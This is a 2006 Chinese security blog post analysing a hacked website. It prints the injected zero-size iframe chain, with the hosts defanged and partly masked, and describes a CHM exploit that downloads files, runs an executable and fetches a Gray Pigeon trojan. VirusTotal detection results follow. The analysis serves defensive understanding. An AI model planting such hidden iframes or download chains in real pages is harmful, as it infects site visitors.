endurer原创
2006-05-04第1版
某网站被加入:
<iframe src="hxxp://95762.***512j.com/" width="0" height="0">
hxxp://95762.***512j.com/index的内容为:
<iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"></iframe>
hxxp://www.***kkkshop.com/images/index.htm的内容为:
<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"></iframe>
hxxp://www.***kkkshop.com/cnshop/img/index.htm的内容为escope()的代码,利用CHM漏洞下载young.gif和young.css两个文件。
young.gif利用WSH在IE临时缓存中寻找young.css,复制为C:\arcldrer.exe并运行;创建c:\cmd.bat来清除痕迹。
Complete scanning result of "young.gif", received in VirusTotal at 05.04.2006, 04:48:34 (CET).
Antivirus
Version
Update
Result
AntiVir
6.34.0.24
04.20.2006
no virus found
Avast
4.6.695.0
05.03.2006
no virus found
AVG
386
05.04.2006
no virus found
Avira
6.34.1.58
05.03.2006
no virus found
BitDefender
7.2
05.04.2006
Exploit.HTML.Mht.ABR
CAT-QuickHeal
8.00
05.03.2006
no virus found
ClamAV
devel-20060426
05.03.2006
no virus found
DrWeb
4.33
05.03.2006
Trojan.DownLoader.4263
eTrust-InoculateIT
23.71.146
05.04.2006
no virus found
eTrust-Vet
12.4.2191
05.02.2006
no virus found
Ewido
3.5
05.03.2006
no virus found
Fortinet
2.71.0.0
05.04.2006
no virus found
F-Prot
3.16c
05.03.2006
no virus found
young.css是个PE格式的文件,会下载hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe,存为C:\Program Files\zone.exe。这个是灰鸽子。
瑞星将young.css报为Trojan.DL.Delf.it。